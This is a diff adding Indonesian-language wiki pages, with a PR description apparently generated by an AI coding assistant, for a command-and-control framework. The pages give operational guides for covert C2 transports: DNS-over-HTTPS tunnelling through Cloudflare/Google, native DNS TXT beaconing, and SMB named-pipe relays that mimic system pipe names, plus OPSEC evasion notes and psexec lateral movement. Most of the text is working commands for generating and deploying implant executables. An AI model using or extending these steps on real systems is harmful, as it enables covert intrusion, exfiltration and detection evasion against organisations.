+---
+
+## Prasyarat: Setup Authoritative DNS Zone
+
+Ini satu-satunya transport yang butuh **domain publik**. Tanpa ini, DoH tidak bisa jalan.
+
+### 1. Beli domain dan set NS records
+
+Di registrar domain kamu (Namecheap, GoDaddy, Cloudflare, dst), set NS record untuk subdomain ke server C2:
+
+```
+tunnel.example.com.  NS  ns1.example.com.
+ns1.example.com.     A   <IP-server-C2>
+```
+
+Artinya: semua DNS query untuk `*.tunnel.example.com` akan diarahkan ke server C2 kamu.
+
+### 2. Buka port DNS di server
+
+```bash
+# Jika server di Linux — buka UDP 5353 (non-root)
+sudo ufw allow 5353/udp
+
+# Atau untuk port 53 (perlu root)
+sudo ufw allow 53/udp
+```
+
+### 3. Test NS delegation dari internet
+
+```bash
+# Dari mesin LAIN (bukan server C2), verifikasi NS delegation
+dig NS tunnel.example.com @8.8.8.8
+# Harus return: tunnel.example.com.  NS  ns1.example.com.
+
+# Test query ke authoritative server langsung
+dig TXT test.tunnel.example.com @<IP-server-C2> -p 5353
+```
+
+---
+
+## Step 1 — Start Server (DoH / DNS listener)
+
+Server jalankan DNS listener untuk menjawab query dari Cloudflare/Google:
+
+```bash
+ENCRYPTION_KEY=MySecretKey32Chars00000000000000 \
+  go run ./cmd/server \
+  --dns \
+  --dns-domain tunnel.example.com \
+  --dns-port 5353 \
+  -port 8080
+```
+
+| Flag | Env | Default | Keterangan |
+|------|-----|---------|-----------|
+| `--dns` | `$DNS_ENABLED` | `false` | Aktifkan DNS listener |
+| `--dns-domain` | `$DNS_DOMAIN` | (required) | Zone authoritative yang kamu kontrol |
+| `--dns-port` | `$DNS_PORT` | `5353` | UDP port DNS listener. Untuk port 53: jalankan dengan sudo atau DNAT |
+
+**Expected log:**
+```
+  [✓]  DNS listener  ·  udp://0.0.0.0:5353  zone=tunnel.example.com
+  [✓]  ready  ·  listening on 0.0.0.0:8080
+```
+
+### Gunakan port 53 (production)
+
+Port 53 butuh root atau special capability:
+
+```bash
+# Opsi 1: jalankan dengan sudo
+sudo ENCRYPTION_KEY=... go run ./cmd/server --dns --dns-domain ... --dns-port 53
+
+# Opsi 2: DNAT iptables (lebih OPSEC — proses tetap non-root)
+sudo iptables -t nat -A PREROUTING -p udp --dport 53 -j REDIRECT --to-port 5353
+sudo iptables -t nat -A OUTPUT -p udp --dport 53 -j REDIRECT --to-port 5353
+ENCRYPTION_KEY=... go run ./cmd/server --dns --dns-domain ... --dns-port 5353
+```
+
+---
+
+## Step 2 — Generate Agent (DoH)
+
+```bash
+# Via Cloudflare DoH (default)
+go run ./cmd/generate/ stageless \
+  --c2 https://fallback.example.com \
+  --key MySecretKey32Chars00000000000000 \
+  --transport doh \
+  --doh-domain tunnel.example.com \
+  --doh-provider cloudflare \
+  --output bin/agent_doh.exe
+
+# Via Google DoH
+go run ./cmd/generate/ stageless \
+  --c2 https://fallback.example.com \
+  --key MySecretKey32Chars00000000000000 \
+  --transport doh \
+  --doh-domain tunnel.example.com \
+  --doh-provider google \
+  --output bin/agent_doh_google.exe
+```
+
+| Flag | Default | Keterangan |
+|------|---------|-----------|
+| `--transport doh` | — | **Wajib** untuk DoH transport |
+| `--doh-domain` | — | **Wajib** — zone authoritative kamu |
+| `--doh-provider` | `cloudflare` | Resolver: `cloudflare` (1.1.1.1) atau `google` (8.8.8.8) |
+| `--c2` | — | Tetap wajib — dipakai sebagai fallback dan untuk ECDH key exchange initial |
+
+> **Catatan**: `--c2` tetap harus berisi URL yang valid. Untuk pure-DoH tanpa HTTP fallback, set ke domain C2 kamu (tidak harus reachable via HTTP, tapi harus bisa di-resolve).
+
+---
+
+## Step 3 — Verify Checkin
+
+### Test DNS query dulu (sebelum jalankan agent)
+
+```bash
+# Dari target machine (atau mesin yang simulate target)
+# Encode "test" sebagai base32 DNS query manual
+curl -s "https://cloudflare-dns.com/dns-query?name=ORSXG5A.tunnel.example.com&type=TXT" \
+  -H "accept: application/dns-json"
+```
+
+Server harus log request masuk:
+```
+[*] DNS query: ORSXG5A.tunnel.example.com  type=TXT
+```
+
+### Jalankan agent
+
+```
+[+] Agent checkin (DoH): <agent-id>  DESKTOP-ABC  user
+```
+
+Checkin via DoH lebih lambat dari HTTP (3-10 detik) — normal karena ada 2x DNS resolution chain.
+
+---
+
+## Step 4 — Verify Traffic di Wireshark
+
+### Di target machine (agent side)
+
+Filter:
+```
+ip.dst == 1.1.1.1 && tcp.port == 443
+```
+
+Yang terlihat: HTTPS POST ke `1.1.1.1:443` dengan path `/dns-query?name=...&type=TXT`. Traffic identik dengan browser yang resolve DNS biasa — tidak ada signature khusus C2.
+
+Inspect query name (setelah decrypt TLS jika punya key):
+```
+name=ABCDEFGHIJK...LMNOPQRSTU.tunnel.example.com
+```
+Bagian sebelum `.tunnel.example.com` adalah base32 payload agent.
+
+### Di server C2 (DNS listener)
+
+```bash
+sudo tcpdump -i eth0 -n udp port 5353
+```
+
+Output:
+```
+IP <cloudflare-ip>.50xxx > <server-ip>.5353: 12345+ TXT? ABCDE....tunnel.example.com.
+IP <server-ip>.5353 > <cloudflare-ip>.50xxx: 12345 1/0/0 TXT "ONSWG..."
+```
+
+---
+
+## Step 5 — Verify Encryption
+
+DoH payload sudah di-encode base32, tapi konten tetap harus terenkripsi AES-GCM. Untuk verify:
+
+```bash
+# Di server, decode TXT query manual
+python3 -c "
+import base64, sys
+label = sys.argv[1].upper().replace('.', '')
+data = base64.b32decode(label + '=' * (-len(label) % 8))
+print(repr(data[:50]))
+" "ABCDEFGH..."
+```
+
+Output harus berupa bytes random (ciphertext), bukan JSON plaintext.
+
+---
+
+## Wire Format Detail
+
+**Agent → Cloudflare → Server (DNS TXT query):**
+```
+Query name: <base32(JSON-envelope)>.tunnel.example.com  TYPE TXT
+```
+
+JSON envelope sebelum encode:
+```json
+{"t": "c", "a": "<agent-id>", "d": "<base64-AES-ciphertext>"}
+```
+- `"t"`: `c`=checkin, `r`=result, `p`=poll
+- Payload di-split jadi label 63-char max, joined dengan `.`
+
+**Server → Cloudflare → Agent (TXT response):**
+```
+TXT value: <base32(JSON-response)>
+```
+
+JSON response:
+```json
+{"s": "ok"}                             // checkin/result diterima
+{"s": "noop"}                           // poll, tidak ada command
+{"s": "cmd", "c": <encrypted-command>}  // push command
+```
+
+---
+
+## Troubleshooting
+
+| Symptom | Penyebab | Solusi |
+|---------|----------|--------|
+| Agent tidak checkin, tidak ada log di server | NS delegation belum propagate | Tunggu 24-48 jam propagasi atau cek dengan `dig NS tunnel.example.com @8.8.8.8` |
+| DNS query masuk ke server tapi malformed | `--doh-domain` di agent tidak match `--dns-domain` di server | Harus identik: `tunnel.example.com` == `tunnel.example.com` |
+| `RCodeNameError` di server log | Query zone salah (bukan subdomain dari `--dns-domain`) | Bug di agent DOH domain config |
+| `RCodeFormatError` di server log | Payload terlalu besar untuk single DNS label | Normal untuk payload besar — agent seharusnya chunk. Cek `icmp_chunk_size` |
+| Latency sangat tinggi (>30s per command) | Cloudflare caching TXT negative responses | Pakai TTL rendah di NS record (60s), atau pake Google DoH sbg alternatif |
+| Server tidak terima query (port 5353) | Firewall block UDP 5353 atau Cloudflare query ke port 53 bukan 5353 | Cek apakah NS delegation benar mengarah ke port 53; pakai DNAT untuk forward port 53 → 5353 |

--- a/wiki/26-transport-dns.md
+++ b/wiki/26-transport-dns.md
@@ -1,0 +1,267 @@
+# Transport: DNS (Native)
+
+Agent mengirim data C2 langsung sebagai DNS TXT query ke authoritative DNS server (server C2) — **tanpa** melewati public resolver. Berbeda dengan DoH yang pakai Cloudflare/Google sebagai perantara, DNS native langsung bisa dikontrol sepenuhnya tanpa ketergantungan third-party.
+
+---
+
+## Perbedaan DNS Native vs DoH
+
+| Aspek | DNS Native | DoH |
+|-------|-----------|-----|
+| Routing | Agent → C2 DNS server langsung | Agent → Cloudflare/Google → C2 DNS server |
+| Port | UDP 53 (atau custom) | TCP 443 |
+| Evasion | Baik (DNS terlihat normal) | Sangat baik (HTTPS ke 1.1.1.1) |
+| Prasyarat | Domain + NS delegation | Domain + NS delegation |
+| Custom resolver | Bisa set manual | Tidak (selalu Cloudflare/Google) |
+| Offline capable | Ya (private network) | Tidak (butuh akses Cloudflare/Google) |
+
+---
+
+## Kapan Dipakai
+
+- **Internal network pivoting** — target di jaringan yang tidak bisa akses internet sama sekali, tapi DNS internal terbuka
+- Environment yang punya **internal DNS server** yang bisa diarahkan ke server C2
+- Ketika DoH tidak bisa dipakai (Cloudflare/Google diblock)
+- Lab testing DNS covert channel tanpa domain publik (pakai IP langsung)
+
+> **OPSEC note**: DNS query ke IP server C2 langsung lebih mudah dideteksi daripada DoH (tidak ada cover traffic dari Cloudflare). Gunakan nama domain yang legitimate atau sembunyikan di balik internal DNS resolver.
+
+---
+
+## Arsitektur
+
+```
+[Agent] --UDP TXT query--> [C2 DNS Listener :5353]
+```
+
+Atau via internal DNS (split-horizon):
+
+```
+[Agent] --UDP query--> [Internal DNS :53] --forward--> [C2 DNS :5353]
+                            (BIND/Unbound)
+```
+
+---
+
+## Prasyarat
+
+Sama seperti DoH, DNS native membutuhkan **authoritative control** atas sebuah zone. Dua mode:
+
+### Mode A: Domain publik (sama seperti DoH setup)
+
+Set NS record untuk subdomain ke IP server C2:
+```
+tunnel.example.com.  NS  ns1.example.com.
+ns1.example.com.     A   <IP-server-C2>
+```
+
+### Mode B: Internal DNS (lab / private network)
+
+Tidak butuh domain publik. Set DNS server agent ke IP server C2 secara langsung via `--dns-server`:
+
+```bash
+# Agent langsung query C2 DNS di 192.168.1.10:5353
+go run ./cmd/generate/ stageless \
+  --transport dns \
+  --dns-domain c2.internal \
+  --dns-server 192.168.1.10:5353 \
+  ...
+```
+
+Ini cocok untuk lab atau pivot lewat internal network.
+
+---
+
+## Step 1 — Start Server (DNS)
+
+```bash
+# Basic DNS listener
+ENCRYPTION_KEY=MySecretKey32Chars00000000000000 \
+  go run ./cmd/server \
+  --dns \
+  --dns-domain tunnel.example.com \
+  --dns-port 5353 \
+  -port 8080
+
+# Untuk port 53 (production, butuh root atau DNAT)
+sudo ENCRYPTION_KEY=... go run ./cmd/server \
+  --dns \
+  --dns-domain tunnel.example.com \
+  --dns-port 53
+
+# Alternatif DNAT (non-root)
+sudo iptables -t nat -A PREROUTING -p udp --dport 53 -j REDIRECT --to-port 5353
+ENCRYPTION_KEY=... go run ./cmd/server \
+  --dns --dns-domain tunnel.example.com --dns-port 5353
+```
+
+| Flag | Env | Default | Keterangan |
+|------|-----|---------|-----------|
+| `--dns` | `$DNS_ENABLED` | `false` | Aktifkan DNS authoritative listener |
+| `--dns-domain` | `$DNS_DOMAIN` | (required) | Zone yang dikontrol |
+| `--dns-port` | `$DNS_PORT` | `5353` | UDP port |
+
+**Expected log:**
+```
+  [✓]  DNS listener  ·  udp://0.0.0.0:5353  zone=tunnel.example.com
+```
+
+---
+
+## Step 2 — Generate Agent (DNS)
+
+```bash
+# DNS via domain publik (NS delegation ke C2)
+go run ./cmd/generate/ stageless \
+  --c2 https://c2.example.com \
+  --key MySecretKey32Chars00000000000000 \
+  --transport dns \
+  --dns-domain tunnel.example.com \
+  --output bin/agent_dns.exe
+
+# DNS langsung ke C2 server (lab / internal network)
+go run ./cmd/generate/ stageless \
+  --c2 http://192.168.1.10:8080 \
+  --key MySecretKey32Chars00000000000000 \
+  --transport dns \
+  --dns-domain c2.internal \
+  --dns-server 192.168.1.10:5353 \
+  --output bin/agent_dns_internal.exe
+```
+
+| Flag | Default | Keterangan |
+|------|---------|-----------|
+| `--transport dns` | — | **Wajib** untuk DNS native transport |
+| `--dns-domain` | — | **Wajib** — zone yang dihandle C2 DNS listener |
+| `--dns-server` | `<c2-host>:5353` | IP:port DNS server. Default: derive dari `--c2` URL hostname + port 5353. Set explicit untuk konfigurasi berbeda |
+
+---
+
+## Step 3 — Test DNS Listener Manual
+
+Sebelum jalankan agent, verifikasi DNS listener jalan:
+
+```bash
+# Dari mesin lain, query TXT record manual
+dig TXT ORSXG5A.tunnel.example.com @<server-ip> -p 5353
+
+# Atau dengan nslookup
+nslookup -type=TXT ORSXG5A.tunnel.example.com <server-ip>
+```
+
+Server harus log:
+```
+[*] DNS query: ORSXG5A.tunnel.example.com  type=TXT  src=<query-ip>
+```
+
+Dan respond dengan TXT record (mungkin error/noop karena payload tidak valid — tapi response menandakan listener aktif).
+
+---
+
+## Step 4 — Verify Checkin
+
+Jalankan agent, server log:
+```
+[+] Agent checkin (DNS): <agent-id>  DESKTOP-ABC  user
+[*] DNS query: <base32>.tunnel.example.com  type=TXT
+```
+
+Catatan: setiap checkin/beacon menghasilkan beberapa DNS query (payload di-chunk karena label max 63 char).
+
+---
+
+## Step 5 — Verify Traffic via tcpdump
+
+### Di server
+
+```bash
+sudo tcpdump -i eth0 -n udp port 5353
+# atau port 53 jika production
+```
+
+Output per query:
+```
+14:23:01 IP 10.10.10.50.42389 > 10.10.10.1.5353: 1234+ TXT? ABCDEFGH...IJKLMNOP.tunnel.example.com. (82)
+14:23:01 IP 10.10.10.1.5353 > 10.10.10.50.42389: 1234 1/0/0 TXT "ONSWG4Y..." (45)
+```
+
+### Wireshark filter
+
+```
+udp.port == 5353 && dns
+```
+
+atau untuk port 53:
+```
+dns.qry.name contains "tunnel.example.com"
+```
+
+Di setiap query, lihat:
+- **Query name**: `<base32>.tunnel.example.com` — panjang label mengindikasikan payload size
+- **TXT response**: base32-encoded command atau noop
+
+---
+
+## Step 6 — Verify Encryption
+
+Decode payload DNS query secara manual untuk konfirmasi konten terenkripsi:
+
+```python
+import base64, sys
+
+# Ambil bagian sebelum .tunnel.example.com, gabungkan labels
+labels = "ABCDEFGH...IJKLMNOP"  # ganti dengan query name aktual
+encoded = labels.upper()
+
+# Tambah padding jika perlu
+padded = encoded + "=" * (-len(encoded) % 8)
+data = base64.b32decode(padded)
+
+# Output: JSON envelope
+print(data[:100])
+```
+
+Output harus berupa bytes yang mengandung `{"t":"c","a":"...","d":"..."}` di mana `"d"` field adalah base64 ciphertext (random bytes), **bukan** plaintext command.
+
+---
+
+## Wire Format Detail
+
+**Agent → Server:**
+```
+DNS TXT query name: <base32(envelope)>.<dns-domain>
+```
+Label di-split tiap 63 karakter:
+```
+ABCDEFGH...IJKLMNOP.QRSTUVWX...YZABCDEF.tunnel.example.com
+```
+
+JSON envelope:
+```json
+{"t": "c"|"r"|"p", "a": "<agent-id>", "d": "<base64-AES-GCM>"}
+```
+
+**Server → Agent:**
+```
+TXT record value: <base32(response)>
+```
+
+Response JSON:
+```json
+{"s": "ok"}
+{"s": "noop"}
+{"s": "cmd", "c": <encrypted-command>}
+```
+
+---
+
+## Troubleshooting
+
+| Symptom | Penyebab | Solusi |
+|---------|----------|--------|
+| No DNS query di server | Agent tidak bisa reach server DNS port | Cek firewall UDP 5353; test `dig @<server> tunnel.example.com` dari target |
+| `RCodeNameError` untuk semua queries | Query zone tidak match `--dns-domain` | Harus exact match: `tunnel.example.com` == `tunnel.example.com` |
+| `RCodeFormatError` | Base32 decode gagal (payload corrupt) | Periksa versi Go agent vs. server — harus sama encoding |
+| Checkin sukses tapi command tidak masuk | Chunking bermasalah — response TXT terlalu besar | DNS TXT record max 255 char per string. Server harus chunk response. Cek `dns_listener.go` |
+| NS delegation tidak terbaca | Registrar belum propagate atau DNS cache | `dig NS tunnel.example.com @8.8.8.8 +norecurse` untuk cek authoritative |
+| Agent pakai DNS server salah | `--dns-server` kosong, derive dari `--c2` URL yang mungkin bukan IP server | Set `--dns-server` explicit: `--dns-server 192.168.1.10:5353` |

--- a/wiki/27-transport-smb.md
+++ b/wiki/27-transport-smb.md
@@ -1,0 +1,288 @@
+# Transport: SMB Named Pipe
+
+Agent mengirim data C2 melalui Windows named pipe (`\\.\pipe\<nama>`) ke sebuah **relay binary** yang berjalan di host perantara. Relay meneruskan traffic ke server C2 via HTTPS. Transport ini dirancang untuk **lateral movement** — agent di host deep-internal yang tidak punya akses internet bisa beacon melalui host pivot yang punya akses ke C2.
+
+---
+
+## Kapan Dipakai
+
+- **Lateral movement** — agent di host internal (DC, workstation, server) tanpa egress internet
+- Environment yang block semua outbound TCP/UDP kecuali SMB (port 445) antar-host internal
+- Ketika kamu mau sembunyikan C2 traffic di dalam file sharing/SMB traffic yang normal
+- Sebagai backup transport ketika HTTP/HTTPS outbound diblock
+
+> **OPSEC note**: SMB antar-host Windows adalah traffic sangat umum di Active Directory environment. Named pipe connection via port 445 blend-in sempurna. Tapi: relay host butuh admin privileges untuk create named pipe, dan koneksi ke relay harus melalui standard SMB (port 445) yang mungkin di-log oleh EDR/SIEM.
+
+---
+
+## Arsitektur
+
+```
+[Agent] --SMB :445--> [Relay Host]
+   (internal host)    (pivot host)   --HTTPS :443--> [Team Server]
+   no internet             ↑
+                     berjalan sebagai
+                     smb_relay.exe
+```
+
+Komponen:
+1. **Agent** (`--transport smb`) — di host internal tanpa internet
+2. **SMB Relay** (`smb_relay.exe`) — di host pivot yang punya akses ke C2 dan bisa di-reach via SMB dari agent
+3. **Team Server** — C2 server (di luar, internet-facing)
+
+---
+
+## Komponen Relay
+
+Relay adalah binary **terpisah** dari server C2:
+
+```
+cmd/listener/smb_relay.go
+```
+
+Harus di-compile dan di-deploy di **relay/pivot host** (Windows), bukan di server C2.
+
+---
+
+## Step 1 — Compile Relay Binary
+
+Di mesin Linux/Windows dengan Go terinstall:
+
+```bash
+# Compile untuk Windows (relay berjalan di Windows)
+GOOS=windows GOARCH=amd64 go build \
+  -o smb_relay.exe \
+  ./cmd/listener/
+
+# Atau dari Windows langsung
+go build -o smb_relay.exe ./cmd/listener/
+```
+
+---
+
+## Step 2 — Deploy dan Jalankan Relay
+
+Transfer `smb_relay.exe` ke **relay/pivot host** (Windows). Jalankan:
+
+```bash
+# Basic — pipe bernama "svcctl", forward ke C2
+smb_relay.exe \
+  --pipe svcctl \
+  --c2 https://c2.example.com
+
+# Dengan AES key dan multiple instances
+smb_relay.exe \
+  --pipe msrpc \
+  --c2 https://c2.example.com \
+  --key MySecretKey32Chars00000000000000 \
+  --instances 10
+```
+
+| Flag | Default | Keterangan |
+|------|---------|-----------|
+| `--pipe` | (required) | Nama pipe (tanpa `\\.\pipe\` prefix). Contoh: `svcctl`, `msrpc`, `browser` |
+| `--c2` | (required) | URL server C2 (HTTPS direkomendasikan) |
+| `--key` | — | AES key — harus match server dan agent |
+| `--instances` | `10` | Max concurrent named pipe instances |
+
+**Pipe name yang umum dipakai untuk blend-in:**
+
+| Pipe Name | Dipakai oleh (mimik) |
+|-----------|---------------------|
+| `svcctl` | Service Control Manager |
+| `msrpc` | Microsoft RPC |
+| `browser` | Computer Browser service |
+| `lsarpc` | LSA |
+| `samr` | Security Account Manager |
+| `netlogon` | Netlogon service |
+
+**Expected log saat relay start:**
+```
+[*] SMB Relay starting
+    Pipe  : \\.\pipe\svcctl
+    C2    : https://c2.example.com
+[+] Listening...
+```
+
+Saat agent connect:
+```
+[+] Client connected: <session-id>
+```
+
+### Catatan privileges
+
+- Named pipe creation di Windows **tidak selalu butuh admin**. Default pipe ACL memungkinkan standard user create pipe.
+- Tapi untuk pipe yang nama-nya mirip system pipe (`svcctl`, `lsarpc`): beberapa EDR flag ini sebagai suspicious jika bukan SYSTEM/service yang buat.
+- Opsi: jalankan relay sebagai service untuk persistence.
+
+---
+
+## Step 3 — Start Team Server
+
+Server C2 tidak butuh flag khusus untuk SMB. Relay forward traffic sebagai HTTP POST/GET biasa:
+
+```bash
+ENCRYPTION_KEY=MySecretKey32Chars00000000000000 \
+  go run ./cmd/server \
+  --tls \
+  --tls-cert server.crt \
+  --tls-key server.key \
+  -port 8080
+```
+
+Relay connect ke `https://c2.example.com` — dari perspektif server ini adalah koneksi HTTPS normal dari relay host.
+
+---
+
+## Step 4 — Generate Agent (SMB)
+
+```bash
+go run ./cmd/generate/ stageless \
+  --c2 https://c2.example.com \
+  --key MySecretKey32Chars00000000000000 \
+  --transport smb \
+  --smb-relay 192.168.1.50 \
+  --smb-pipe svcctl \
+  --output bin/agent_smb.exe
+```
+
+| Flag | Default | Keterangan |
+|------|---------|-----------|
+| `--transport smb` | — | **Wajib** untuk SMB transport |
+| `--smb-relay` | — | **Wajib** — hostname atau IP relay host |
+| `--smb-pipe` | `svcctl` | Nama pipe yang sama dengan relay `--pipe` flag |
+
+Agent akan connect ke: `\\192.168.1.50\pipe\svcctl`
+
+---
+
+## Step 5 — Deploy dan Jalankan Agent
+
+Transfer `agent_smb.exe` ke **host internal** (bukan relay host). Jalankan:
+
+```
+agent_smb.exe
+```
+
+Atau via post-exploitation (lateral movement, misalnya via `psexec`, `wmiexec`, `dcom`):
+
+```bash
+# Via operator console — lateral movement setelah agent pertama established
+go run ./cmd/operator/ lateral --method psexec \
+  --agent <current-agent-id> \
+  --target 192.168.1.100 \
+  --payload bin/agent_smb.exe
+```
+
+---
+
+## Step 6 — Verify Checkin
+
+**Relay log:**
+```
+[+] Client connected: <session>
+[*] Frame received: type=0x00 len=<bytes>
+[*] Forwarding to C2...
+[+] C2 response: 200 OK
+```
+
+**Server log:**
+```
+[+] Agent checkin: <agent-id>  192.168.1.100  CORP-WS01  domain\user  windows/amd64
+```
+
+Perhatikan: IP yang tercatat di server adalah IP **relay host** (192.168.1.50), bukan host agent yang sebenarnya (192.168.1.100). Ini by design — relay adalah yang connect ke C2.
+
+---
+
+## Step 7 — Verify Traffic via Wireshark
+
+### Di relay host — traffic ke C2
+
+```
+tcp.port == 443 && ip.dst == <c2-server-ip>
+```
+
+Terlihat: HTTPS POST ke server C2 — identik dengan web traffic biasa.
+
+### Di agent host — SMB traffic ke relay
+
+```
+tcp.port == 445 && smb
+```
+
+Atau lebih spesifik:
+```
+smb.path contains "svcctl"
+```
+
+SMB frame breakdown:
+- SMB2 IOCTL / WriteFile / ReadFile ke named pipe
+- Magic bytes di payload: `0x54425550` ("TBUP")
+
+### tcpdump di relay host
+
+```bash
+# Lihat SMB masuk dari agent
+tcpdump -i eth0 -n "tcp port 445 and src host 192.168.1.100"
+
+# Lihat HTTPS keluar ke C2
+tcpdump -i eth0 -n "tcp port 443 and dst host <c2-ip>"
+```
+
+---
+
+## Wire Format Detail
+
+**Agent → Relay (named pipe binary frame):**
+```
+[magic: 0x54425550 (4 bytes LE)]
+[type:  0x00=data | 0x01=poll | 0x02=ack (1 byte)]
+[len:   payload length (4 bytes LE)]
+[payload: JSON (encrypted_payload + agent_id)]
+```
+
+**Relay → C2 (HTTP forwarding):**
+- Data frame (type 0x00) → `POST /api/v1/checkin` body = payload JSON
+- Poll frame (type 0x01) → `GET /api/v1/command/<sessionID>/next`
+
+**Relay → Agent (ack frame):**
+```
+[magic: 0x54425550]
+[type:  0x02 (ack)]
+[len:   C2 response length]
+[payload: C2 HTTP response body]
+```
+
+---
+
+## Deployment Scenarios
+
+### Scenario 1: Internet-facing pivot
+
+```
+[Corporate LAN]              [DMZ]           [Internet]
+Agent (no egress) --SMB--> Relay ------HTTPS-----> C2 Server
+```
+
+### Scenario 2: Double hop
+
+```
+Agent --SMB--> Relay1 --SMB--> Relay2 --HTTPS--> C2
+```
+
+Tidak supported native — Relay binary hanya forward ke C2 via HTTP, tidak forward ke relay lain. Workaround: jalankan relay di Relay2, relay di Relay1 buat koneksi ke Relay2 via SOCKS dari agent. Untuk setup ini, pakai pivot SOCKS dulu (lihat [wiki/17-network-pivot.md](17-network-pivot.md)).
+
+---
+
+## Troubleshooting
+
+| Symptom | Penyebab | Solusi |
+|---------|----------|--------|
+| `CreateNamedPipe: Access is denied` | Relay butuh elevated privilege untuk pipe name itu | Jalankan relay sebagai Administrator, atau ganti nama pipe ke yang tidak restricted |
+| Agent: `SMB open: CreateFile: The network path was not found` | Relay host tidak reachable via SMB (port 445 diblock) | Cek firewall; test `Test-NetConnection 192.168.1.50 -Port 445` dari target |
+| Agent: `SMB open: CreateFile: The system cannot find the file specified` | Pipe belum dibuat (relay tidak jalan atau nama pipe beda) | Pastikan relay jalan, dan `--smb-pipe` agent == `--pipe` relay |
+| Relay: `Bad magic: 0x...` | Versi agent tidak match relay (frame format beda) | Rebuild agent dan relay dari source yang sama |
+| Server tidak melihat agent (relay connect tapi checkin gagal) | `--key` relay tidak match `ENCRYPTION_KEY` server | Set `--key` relay sama dengan server `ENCRYPTION_KEY` |
+| Relay log `C2 proxy error: x509 certificate signed by unknown authority` | C2 pakai self-signed cert | Jalankan relay dengan `--insecure` flag atau beri relay cert yang valid |
+| Agent muncul di server dengan IP relay, bukan IP agent | Normal behavior — relay adalah yang connect ke C2 | Untuk track IP agent sebenarnya, lihat agent metadata (hostname, username) |


### PR DESCRIPTION
## Summary

- **Transport flags** — `taburtuai-generate stageless` sekarang punya `--transport {http|https|ws|doh|dns|icmp|smb}` dan 8 sub-flag terkait. Sebelumnya transport butuh inject `-ldflags` manual, membuat testing end-to-end tidak praktis.
- **Per-transport validation** — setiap transport memvalidasi flag yang dibutuhkan sebelum compile (e.g. `--transport doh` tanpa `--doh-domain` → error; transport tidak valid → error).
- **ICMP warning** — `--transport icmp` menampilkan warning bahwa server-side listener belum diimplementasikan (ROADMAP 11.4).
- **6 wiki testing pages** — panduan end-to-end per transport mencakup server command, generate command, verify checkin, Wireshark/tcpdump filter, wire format, dan troubleshooting.

## Changed Files

| File | Perubahan |
|------|----------|
| `cmd/generate/generator.go` | +9 transport fields di `Config`; switch ldflags injection di `Build()` |
| `cmd/generate/build.go` | +`--transport` + 8 sub-flags; validasi per-transport; updated examples |
| `pkg/transport/icmp_windows.go` | TODO comment — server listener belum ada (ROADMAP 11.4) |
| `wiki/22-transport-http.md` | **NEW** HTTP transport testing guide |
| `wiki/23-transport-https.md` | **NEW** HTTPS: cert options, pinning, double-encryption verify |
| `wiki/24-transport-ws.md` | **NEW** WebSocket: push-tasking test, reconnect, wire format |
| `wiki/25-transport-doh.md` | **NEW** DoH: NS delegation, Cloudflare/Google, payload decode |
| `wiki/26-transport-dns.md` | **NEW** DNS native: publik vs internal-network mode |
| `wiki/27-transport-smb.md` | **NEW** SMB: relay compile/deploy, pivot architecture |

## Test Plan

- [x] `go build ./cmd/generate/` — clean
- [x] `go vet ./cmd/generate/ ./cmd/agent/` — clean
- [x] `GOOS=windows GOARCH=amd64 go build ./...` — clean
- [x] `--transport doh` tanpa `--doh-domain` → exit 1 dengan error message jelas
- [x] `--transport bogus` → exit 1 dengan error message jelas
- [x] `--transport ws` build → binary terverifikasi mengandung `-X main.defaultTransport=ws`
- [ ] End-to-end transport testing (HTTP, HTTPS, WS) — dilakukan manual mengikuti wiki/22-24

🤖 Generated with [Claude Code](https://claude.com/claude-code)